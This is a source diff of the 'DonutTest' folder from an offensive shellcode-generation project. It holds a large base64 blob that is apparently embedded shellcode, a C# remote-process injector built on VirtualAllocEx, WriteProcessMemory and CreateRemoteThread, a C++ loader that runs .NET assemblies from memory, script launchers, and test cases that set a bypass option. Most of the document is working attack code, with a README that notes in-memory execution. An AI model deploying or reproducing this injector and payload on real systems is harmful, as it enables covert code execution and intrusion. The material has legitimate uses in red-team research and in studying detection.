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";
14
15 static int pid = Process.GetCurrentProcess().Id;
16
17 static void Main(string[] args)
18 {
19 if (args.Length >= 1)
20 {
21 pid = Convert.ToInt32(args[0]);
22
23 //If a raw shellcode file was provided as a second argument
24 if (args.Length == 2)
25 {
26 Console.WriteLine("[+] Reading shellcode from {0}.", args[1]);
27
28 Inject(System.IO.File.ReadAllBytes(args[1]), pid);
29 }
30 else
31 {
32 Console.WriteLine("[+] Using embedded shellcode.");
33
34 Inject(x86, x64, pid);
35 }
36 }
37 }
38
39 [DllImport("kernel32.dll")]
40 public static extern IntPtr OpenProcess(int dwDesiredAccess, bool bInheritHandle, int dwProcessId);
41
42 [DllImport("kernel32.dll", CharSet = CharSet.Auto)]
43 public static extern IntPtr GetModuleHandle(string lpModuleName);
44
45 [DllImport("kernel32", CharSet = CharSet.Ansi, ExactSpelling = true, SetLastError = true)]
46 static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
47
48 [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
49 static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress,
50 uint dwSize, uint flAllocationType, uint flProtect);
51
52 [DllImport("kernel32.dll", SetLastError = true)]
53 static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, uint nSize, out UIntPtr lpNumberOfBytesWritten);
54
55 [DllImport("kernel32.dll")]
56 static extern IntPtr CreateRemoteThread(IntPtr hProcess,
57 IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
58
59 const int PROCESS_CREATE_THREAD = 0x0002;
60 const int PROCESS_QUERY_INFORMATION = 0x0400;
61 const int PROCESS_VM_OPERATION = 0x0008;
62 const int PROCESS_VM_WRITE = 0x0020;
63 const int PROCESS_VM_READ = 0x0010;
64
65
66 const uint MEM_COMMIT = 0x00001000;
67 const uint MEM_RESERVE = 0x00002000;
68 const uint PAGE_READWRITE = 4;
69 const uint PAGE_EXECUTE_READWRITE = 0x40;
70
71
72 /// <summary>
73 /// An entry point callable from Donut or other Reflection-based loaders.
74 /// </summary>
75 /// <param name="procPID">The PID of the target process, as a string</param>
76 public static void Run(string procPID)
77 {
78 int pid = Convert.ToInt32(procPID);
79
80 Console.WriteLine("[+] Using embedded shellcode.");
81
82 Inject(x86, x64, pid);
83 }
84
85 /// <summary>
86 /// Injects shellcode into the target process using CreateRemoteThread, using the correct version for the process's architecture.
87 /// </summary>
88 /// <param name="x86">Base64-encoded x86 shellcode.</param>
89 /// <param name="x64">Base64-encoded x64 shellcode</param>
90 /// <param name="procPID">The PID of the target process.</param>
91 /// <returns></returns>
92 public static int Inject(string x86, string x64, int procPID)
93 {
94
95 Process targetProcess = Process.GetProcessById(procPID);
96 Console.WriteLine(targetProcess.Id);
97
98 string s;
99
100 if (IsWow64Process(targetProcess) == true)
101 s = x86;
102 else
103 s = x64;
104
105 byte[] shellcode = Convert.FromBase64String(s);
106
107 if (Inject(shellcode, procPID) != IntPtr.Zero)
108 Console.WriteLine("[!] Successfully injected into {0} ({1})!", targetProcess.ProcessName, procPID);
109 else
110 Console.WriteLine("[!] Failed to inject!");
111
112 return 0;
113 }
114
115 /// <summary>
116 /// Injects raw shellcode into the target process using CreateRemoteThread.
117 /// </summary>
118 /// <param name="shellcode">The shellcode to inject.</param>
119 /// <param name="procPID">The PID of the target process.</param>
120 /// <returns></returns>
121 public static IntPtr Inject(byte[] shellcode, int procPID)
122 {
123 IntPtr procHandle = OpenProcess(PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ, false, procPID);
124
125 IntPtr allocMemAddress = VirtualAllocEx(procHandle, IntPtr.Zero, (uint)shellcode.Length, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
126
127 UIntPtr bytesWritten;
128 WriteProcessMemory(procHandle, allocMemAddress, shellcode, (uint)shellcode.Length, out bytesWritten);
129
130 return CreateRemoteThread(procHandle, IntPtr.Zero, 0, allocMemAddress, IntPtr.Zero, 0, IntPtr.Zero);
131
132 }
133
134 [System.Runtime.InteropServices.DllImport("kernel32.dll")]
135 public static extern bool IsWow64Process(System.IntPtr hProcess, out bool lpSystemInfo);
136
137 /// <summary>
138 /// Checks whether the process is 64-bit.
139 /// </summary>
140 /// <returns>Returns true if process is 64-bit, and false if process is 32-bit.</returns>
141 public static bool IsWow64Process(Process process)
142 {
143 bool retVal = false;
144 IsWow64Process(process.Handle, out retVal);
145 return retVal;
146 }
147 }
148 }
+36
-0
DonutTest/Properties/AssemblyInfo.cs less more
0 using System.Reflection;
1 using System.Runtime.CompilerServices;
2 using System.Runtime.InteropServices;
3
4 // General Information about an assembly is controlled through the following
5 // set of attributes. Change these attribute values to modify the information
6 // associated with an assembly.
7 [assembly: AssemblyTitle("DonutTest")]
8 [assembly: AssemblyDescription("")]
9 [assembly: AssemblyConfiguration("")]
10 [assembly: AssemblyCompany("")]
11 [assembly: AssemblyProduct("DonutTest")]
12 [assembly: AssemblyCopyright("Copyright © 2019")]
13 [assembly: AssemblyTrademark("")]
14 [assembly: AssemblyCulture("")]
15
16 // Setting ComVisible to false makes the types in this assembly not visible
17 // to COM components. If you need to access a type in this assembly from
18 // COM, set the ComVisible attribute to true on that type.
19 [assembly: ComVisible(false)]
20
21 // The following GUID is for the ID of the typelib if this project is exposed to COM
22 [assembly: Guid("3c9a6b88-bed2-4ba8-964c-77ec29bf1846")]
23
24 // Version information for an assembly consists of the following four values:
25 //
26 // Major Version
27 // Minor Version
28 // Build Number
29 // Revision
30 //
31 // You can specify all the values or you can default the Build and Revision Numbers
32 // by using the '*' as shown below:
33 // [assembly: AssemblyVersion("1.0.*")]
34 [assembly: AssemblyVersion("1.0.0.0")]
35 [assembly: AssemblyFileVersion("1.0.0.0")]
+42
-0
DonutTest/Readme.md less more
0 # DonutTest
1
2 A simple C# shellcode remote injector to use in testing donut. It contains both x86 and x64 versions of the shellcode, determines the architecture of the target process, and then injects the appropriate version into that process with CreateRemoteThread. The shellcode must be Base64-encoded and dropped into the code as a string. This ensures that it can be run entirely from memory.
3
4 You may Base64-encode your shellcode and copy it to your clipboard with the PowerShell below:
5
6 ```powershell
7 $filename = "C:\\Test\donut\\loader.bin"
8 [Convert]::ToBase64String([IO.File]::ReadAllBytes($filename)) | clip
9 ```
10
11 ```
12 Usage:
13
14 DonutTest.exe [PID]
15
16 If no PID is specified, then DonutTest will inject the shellcode into itself.
17 ```
18
19 # Building on Linux
20
21 This project can be built on Linux using Mono and xbuild. First, follow the official [instructions](https://www.mono-project.com/download/stable/#download-lin) for install Mono. Then, install `mono-xbuild`.
22
23 To build the project, simply `cd` to its root directory and run:
24
25 ```
26 xbuild
27 ```
28
29 To build in Release mode, run:
30
31 ```
32 xbuild /p:Configuration=Release
33 ```
34
35 If receiving errors about missing dependencies, try specifying the targeted .NET version:
36
37 ```
38 xbuild /p:TargetFrameworkVersion="v4.5"
39 ```
40
41 Once the project has been successfully built, the output DLL may be used as input to the Donut shellcode generator.
+5
-0
DonutTest/calc.js less more
0
1 var sh
2 sh = new ActiveXObject("Wscript.Shell")
3 sh.Run("calc.exe")
4 WScript.Quit()
+7
-0
DonutTest/calc.vbs less more
0
1 Dim sh
2 Set sh = CreateObject("Wscript.Shell")
3 Call sh.Run("calc.exe")
4 Set sh = Nothing
5 WScript.Quit()
6
+36
-0
DonutTest/dlltest.c less more
0 #define WIN32_LEAN_AND_MEAN
1 #define UNICODE
2
3 #include <windows.h>
4 #include "donut.h"
5
6 #pragma comment(lib, "user32.lib")
7
8 __declspec(dllexport)
9 VOID APIENTRY DonutApiVoid(VOID) {
10 MessageBoxA(NULL, "Hello, World!", "Donut Test for VOID API", MB_OK);
11 }
12
13 __declspec(dllexport)
14 VOID APIENTRY DonutApiW(PWCHAR argv) {
15 MessageBoxW(NULL, argv, L"Donut Test for UNICODE strings", MB_OK);
16 }
17
18 __declspec(dllexport)
19 VOID APIENTRY DonutApiA(PCHAR argv) {
20 MessageBoxA(NULL, argv, "Donut Test for ANSI strings", MB_OK);
21 }
22
23 __declspec(dllexport)
24 BOOL APIENTRY DllMain(HMODULE hModule,
25 DWORD ul_reason_for_call,
26 LPVOID lpReserved) {
27 switch (ul_reason_for_call) {
28 case DLL_PROCESS_ATTACH:
29 case DLL_THREAD_ATTACH:
30 case DLL_THREAD_DETACH:
31 case DLL_PROCESS_DETACH:
32 break;
33 }
34 return TRUE;
35 }
+0
-56
DonutTest/hello.c less more
0 #define UNICODE
1
2 #include <stdint.h>
3 #include <stdio.h>
4 #include <stdlib.h>
5 #include <string.h>
6 #include <sys/stat.h>
7 #include <inttypes.h>
8
9 #include <windows.h>
10 #pragma comment(lib, "user32.lib")
11 #pragma comment(lib, "shell32.lib")
12
13 __declspec(dllexport)
14 VOID WINAPI RunProcess(PWCHAR proc1, PWCHAR proc2) {
15 PROCESS_INFORMATION pi;
16 STARTUPINFO si;
17
18 ZeroMemory(&si, sizeof(si));
19 si.cb = sizeof(si);
20 CreateProcess(NULL, proc1, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi);
21
22 ZeroMemory(&si, sizeof(si));
23 si.cb = sizeof(si);
24 CreateProcess(NULL, proc2, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi);
25 }
26
27 __declspec(dllexport)
28 VOID WINAPI DonutApiW(PWCHAR arg0, PWCHAR arg1, PWCHAR arg2, PWCHAR arg3) {
29 WCHAR msg[4096];
30
31 _snwprintf(msg, ARRAYSIZE(msg),
32 L"param[0] : %ws\r"
33 L"param[1] : %ws\r"
34 L"param[2] : %ws\r"
35 L"param[3] : %ws\r",
36 arg0, arg1, arg2, arg3);
37
38 MessageBox(NULL, msg, L"Donut Test", MB_OK);
39 }
40
41 __declspec(dllexport)
42 BOOL WINAPI DllMain(HMODULE hModule,
43 DWORD ul_reason_for_call,
44 LPVOID lpReserved) {
45 switch (ul_reason_for_call) {
46 case DLL_PROCESS_ATTACH:
47 MessageBox(NULL, L"Hello, World!", L"Hello, World!", 0);
48 break;
49 case DLL_THREAD_ATTACH:
50 case DLL_THREAD_DETACH:
51 case DLL_PROCESS_DETACH:
52 break;
53 }
54 return TRUE;
55 }
+146
-0
DonutTest/rundotnet.cpp less more
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 #include <windows.h>
32 #include <oleauto.h>
33 #include <mscoree.h>
34 #include <comdef.h>
35
36 #include <cstdio>
37 #include <cstdint>
38 #include <cstring>
39 #include <cstdlib>
40 #include <sys/stat.h>
41
42 #pragma comment(lib, "mscoree.lib")
43 #import "mscorlib.tlb" raw_interfaces_only
44
45 void rundotnet(void *code, size_t len) {
46 HRESULT hr;
47 ICorRuntimeHost *icrh;
48 IUnknownPtr iu;
49 mscorlib::_AppDomainPtr ad;
50 mscorlib::_AssemblyPtr as;
51 mscorlib::_MethodInfoPtr mi;
52 VARIANT v1, v2;
53 SAFEARRAY *sa;
54 SAFEARRAYBOUND sab;
55
56 printf("CorBindToRuntime(ICorRuntimeHost).\n");
57 hr = CorBindToRuntime(
58 NULL, // load latest runtime version available
59 NULL, // load workstation build
60 CLSID_CorRuntimeHost,
61 IID_ICorRuntimeHost,
62 (LPVOID*)&icrh);
63
64 if(FAILED(hr)) return;
65
66 printf("ICorRuntimeHost::Start()\n");
67 hr = icrh->Start();
68 if(SUCCEEDED(hr)) {
69 printf("ICorRuntimeHost::GetDefaultDomain()\n");
70 hr = icrh->GetDefaultDomain(&iu);
71 if(SUCCEEDED(hr)) {
72 printf("IUnknown::QueryInterface()\n");
73 hr = iu->QueryInterface(IID_PPV_ARGS(&ad));
74 if(SUCCEEDED(hr)) {
75 sab.lLbound = 0;
76 sab.cElements = len;
77 printf("SafeArrayCreate()\n");
78 sa = SafeArrayCreate(VT_UI1, 1, &sab);
79 if(sa != NULL) {
80 CopyMemory(sa->pvData, code, len);
81 printf("AppDomain::Load_3()\n");
82 hr = ad->Load_3(sa, &as);
83 if(SUCCEEDED(hr)) {
84 printf("Assembly::get_EntryPoint()\n");
85 hr = as->get_EntryPoint(&mi);
86 if(SUCCEEDED(hr)) {
87 v1.vt = VT_NULL;
88 v1.plVal = NULL;
89 printf("MethodInfo::Invoke_3()\n");
90 hr = mi->Invoke_3(v1, NULL, &v2);
91 mi->Release();
92 }
93 as->Release();
94 }
95 SafeArrayDestroy(sa);
96 }
97 ad->Release();
98 }
99 iu->Release();
100 }
101 icrh->Stop();
102 }
103 icrh->Release();
104 }
105
106 int main(int argc, char *argv[])
107 {
108 void *mem;
109 struct stat fs;
110 FILE *fd;
111
112 if(argc != 2) {
113 printf("usage: rundotnet <.NET assembly>\n");
114 return 0;
115 }
116
117 // 1. get the size of file
118 stat(argv[1], &fs);
119
120 if(fs.st_size == 0) {
121 printf("file is empty.\n");
122 return 0;
123 }
124
125 // 2. try open assembly
126 fd = fopen(argv[1], "rb");
127 if(fd == NULL) {
128 printf("unable to open \"%s\".\n", argv[1]);
129 return 0;
130 }
131 // 3. allocate memory
132 mem = malloc(fs.st_size);
133 if(mem != NULL) {
134 // 4. read file into memory
135 fread(mem, 1, fs.st_size, fd);
136 // 5. run the program from memory
137 rundotnet(mem, fs.st_size);
138 // 6. free memory
139 free(mem);
140 }
141 // 7. close assembly
142 fclose(fd);
143
144 return 0;
145 }
DonutTest/rundotnet.exe less more
Binary diff not shown
+0
-88
DonutTest/testcase.c less more
0
1
2 // just some simple test cases to use with donut library
3
4 #include "donut.h"
5
6 typedef struct _test_case_t {
7 int arch;
8 int bypass;
9 int inst_type;
10 char *domain;
11 char *cls;
12 char *method;
13 char *param;
14 char *file;
15 char *url;
16 char *runtime;
17 int err; // expected result based on test case
18 } test_case;
19
20 test_case tests[] = {
21 // nothing supplied
22 {0,0,0,"","","","","","","",DONUT_ERROR_INVALID_PARAMETER},
23 // requesting x86 shellcode for x64 DLL
24 {DONUT_ARCH_X86,DONUT_BYPASS_CONTINUE,DONUT_INSTANCE_PIC,"domain","cls","method","param","hello_amd64.dll","","",DONUT_ERROR_ARCH_MISMATCH},
25 // requesting x64 shellcode for x86 DLL
26 {DONUT_ARCH_X64,DONUT_BYPASS_CONTINUE,DONUT_INSTANCE_PIC,"domain","","","","hello_x86.dll","","",DONUT_ERROR_ARCH_MISMATCH},
27 // supplying parameters for unmanaged DLL, but not function name
28 {DONUT_ARCH_X64,DONUT_BYPASS_CONTINUE,DONUT_INSTANCE_PIC,"domain","","","calc.exe,notepad.exe","hello_amd64.dll","","",DONUT_ERROR_DLL_PARAM},
29 // supplying function name that can't be found in DLL
30 {DONUT_ARCH_X64,DONUT_BYPASS_CONTINUE,DONUT_INSTANCE_PIC,"domain","","NoMethod","calc.exe,notepad.exe","hello_amd64.dll","","",DONUT_ERROR_DLL_FUNCTION},
31 // supplying file that isn't recognized
32 {DONUT_ARCH_ANY,DONUT_BYPASS_CONTINUE,DONUT_INSTANCE_PIC,"","","","","/dev/null","","",DONUT_ERROR_FILE_INVALID},
33 // .NET DLL assembly with no method provided
34 {DONUT_ARCH_X84,DONUT_BYPASS_CONTINUE,DONUT_INSTANCE_PIC,"domain","TestClass","","","class1.dll","","",DONUT_ERROR_NET_PARAMS},
35 // .NET DLL assembly with no class provided
36 {DONUT_ARCH_X84,DONUT_BYPASS_CONTINUE,DONUT_INSTANCE_PIC,"domain","","RunProcess","calc.exe,notepad.exe","class1.dll","","",DONUT_ERROR_NET_PARAMS},
37 // .NET DLL with good parameters
38 {DONUT_ARCH_X84,DONUT_BYPASS_CONTINUE,DONUT_INSTANCE_PIC,"domain","TestClass","RunProcess","calc.exe,notepad.exe","class1.dll","","",DONUT_ERROR_SUCCESS},
39 // invalid URL
40 {DONUT_ARCH_X84,DONUT_BYPASS_CONTINUE,DONUT_INSTANCE_URL,"domain","TestClass","RunProcess","calc.exe,notepad.exe","class1.dll","http:","",DONUT_ERROR_INVALID_URL},
41 // invalid URL length
42 {DONUT_ARCH_X84,DONUT_BYPASS_CONTINUE,DONUT_INSTANCE_URL,"domain","TestClass","RunProcess","calc.exe,notepad.exe","class1.dll","http://","",DONUT_ERROR_URL_LENGTH},
43 {DONUT_ARCH_X84,DONUT_BYPASS_CONTINUE,DONUT_INSTANCE_URL,"domain","TestClass","RunProcess","calc.exe,notepad.exe","class1.dll","https://","",DONUT_ERROR_URL_LENGTH},
44 {DONUT_ARCH_X84,DONUT_BYPASS_CONTINUE,DONUT_INSTANCE_URL,"domain","TestClass","RunProcess","calc.exe,notepad.exe","class1.dll","https://a","",DONUT_ERROR_SUCCESS},
45 {DONUT_ARCH_X84,DONUT_BYPASS_CONTINUE,DONUT_INSTANCE_URL,"domain","TestClass","RunProcess","calc.exe,notepad.exe","class1.dll",
46 "https://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
47 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
48 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
49 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
50 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
51 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
52 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
53 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
54 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
55 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",
56 "",DONUT_ERROR_URL_LENGTH},
57 };
58
59 int main(void)
60 {
61 DONUT_CONFIG c;
62 int err, i;
63
64 for(i=0; i<sizeof(tests)/sizeof(test_case); i++) {
65 memset(&c, 0, sizeof(c));
66
67 c.arch = tests[i].arch;
68 c.bypass = tests[i].bypass;
69 c.inst_type = tests[i].inst_type;
70
71 strncpy(c.domain , tests[i].domain, sizeof(c.domain) - 1);
72 strncpy(c.cls , tests[i].cls, sizeof(c.cls) - 1);
73 strncpy(c.method , tests[i].method, sizeof(c.method) - 1);
74 strncpy(c.param , tests[i].param, sizeof(c.param) - 1);
75 strncpy(c.file , tests[i].file, sizeof(c.file) - 1);
76 strncpy(c.url , tests[i].url, sizeof(c.url) - 1);
77 strncpy(c.runtime, tests[i].runtime, sizeof(c.runtime) - 1);
78
79 printf("Test Case # %2i ", (i+1));
80 err = DonutCreate(&c);
81 DonutDelete(&c);
82
83 printf("returned %2i : %s\n",
84 err, err == tests[i].err ? "OK" : "FAILED");
85 }
